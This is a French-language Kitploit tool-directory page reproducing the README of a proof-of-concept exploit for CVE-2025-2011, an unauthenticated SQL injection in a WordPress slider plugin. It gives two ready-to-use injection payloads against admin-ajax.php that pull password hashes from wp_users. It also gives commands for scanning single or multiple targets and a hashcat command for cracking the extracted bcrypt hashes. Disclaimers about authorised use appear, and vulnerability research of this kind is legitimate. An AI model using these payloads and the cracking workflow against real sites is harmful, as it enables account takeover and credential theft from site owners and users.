Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-2011 — Exploit for CVE-2025-2011 | Kitploit
Outils/GitHubGitHub/x3rx3ssec/cve-2025-2011
Password CrackingVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubx3rx3ssec/cve-2025-2011

CVE-2025-2011

Exploit for CVE-2025-2011

Voir le dépôt
1il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-2011 PoC

Par : X3RX3S Mais fièrement arraché par Ash Wesker qui a utilisé GPT sur mon code avec sa bannière ;) voir ici ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 Vous pouvez même voir mon pseudo dans 'son' code -_-'

Objectif : Un outil de preuve de concept pour tester une vulnérabilité d'injection SQL (CVE-2025-2011) contre des sites WordPress.
Avertissement : Utilisez uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite. Les tests non autorisés sont illégaux et contraires à l'éthique. Capture d'écran du 2025-11-02 à 19-44-16


À propos de la vulnérabilité :)

  • Le plugin Slider & Popup Builder by Depicter pour WordPress est vulnérable à une injection SQL générique via le paramètre ‘s' dans toutes les versions jusqu'à la version 3.6.1 incluse, en raison d'un échappement insuffisant du paramètre fourni par l'utilisateur et d'un manque de préparation suffisante de la requête SQL existante. Cela permet à des attaquants non authentifiés d'ajouter des requêtes SQL supplémentaires dans des requêtes existantes, ce qui peut être utilisé pour extraire des informations sensibles de la base de données.

Fonctionnalités

  • Deux payloads SQLi (sélectionnables avec -p 1 ou -p 2)
  • Détection de hachages Bcrypt ($2a$, $2b$, $2y$), y compris les variantes préfixées par $wp$
  • Résultats sauvegardés par nom d'hôte : results_<hostname>.txt
  • Intégration optionnelle d'Hashcat pour bcrypt (-m 3200) avec une invite
  • Prend en charge une URL unique (-u) ou plusieurs cibles via un fichier (-f)

Prérequis

  • Python 3.8+
  • Paquets pip :
    • requests
    • colorama

Installer les dépendances :

root@kitploit:~
pip install requests colorama

Optionnel (pour le craquage) :

  • hashcat installé et disponible dans votre PATH (Par défaut /usr/share/wordlists/rockyou.txt)
  • Une wordlist comme /usr/share/wordlists/rockyou.txt

Utilisation

Rendre le script exécutable (optionnel) :

root@kitploit:~
chmod +x CVE-2025-2011.py

Cible unique (payload 1 par défaut) :

root@kitploit:~
python3 CVE-2025-2011.py -u https://example.com

Cible unique (payload 2) :

root@kitploit:~
python3 CVE-2025-2011.py -u https://example.com -p 2

Plusieurs cibles à partir d'un fichier (une URL par ligne) :

root@kitploit:~
python3 CVE-2025-2011.py -f targets.txt

Résultat

Pour chaque hôte testé, le script enregistre un fichier de résultat :

root@kitploit:~
results_<hostname>.txt

Si des hachages bcrypt sont trouvés, ils sont sauvegardés dans hashes.txt et vous serez invité à les casser avec Hashcat. Exemple de commande Hashcat utilisée par le script :

root@kitploit:~
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt

Note : bcrypt est lent par conception. Le craquage peut prendre beaucoup de temps et nécessiter des GPU.


Payloads

  • Payload 1 (par défaut) :
root@kitploit:~
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
  • Payload 2 :
root@kitploit:~
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x

Utilisation légale et responsable

Cet outil est fourni à des fins éducatives et défensives uniquement. Ne l'utilisez pas contre des systèmes pour lesquels vous n'avez pas d'autorisation explicite. L'auteur et le distributeur déclinent toute responsabilité en cas d'utilisation abusive. Obtenez toujours une autorisation écrite avant d'effectuer des tests contre des cibles qui ne vous appartiennent pas.


Remarques et réglages

  • Si vous avez d'autres wordlists, mettez à jour la fonction run_hashcat dans le script pour pointer vers votre liste préférée.
  • Si Hashcat n'est pas installé ou si vous préférez ne pas casser les hachages, répondez N lorsque vous y êtes invité.
  • Vous pouvez ajuster les timeouts et le comportement des threads dans le script pour un scan à grande échelle.

Assemblé par

  • X3RX3S
  • Inspiré par les workflows de recherche en sécurité responsables et Chocapikk (https://github.com/Chocapikk.)
Télécharger l’outil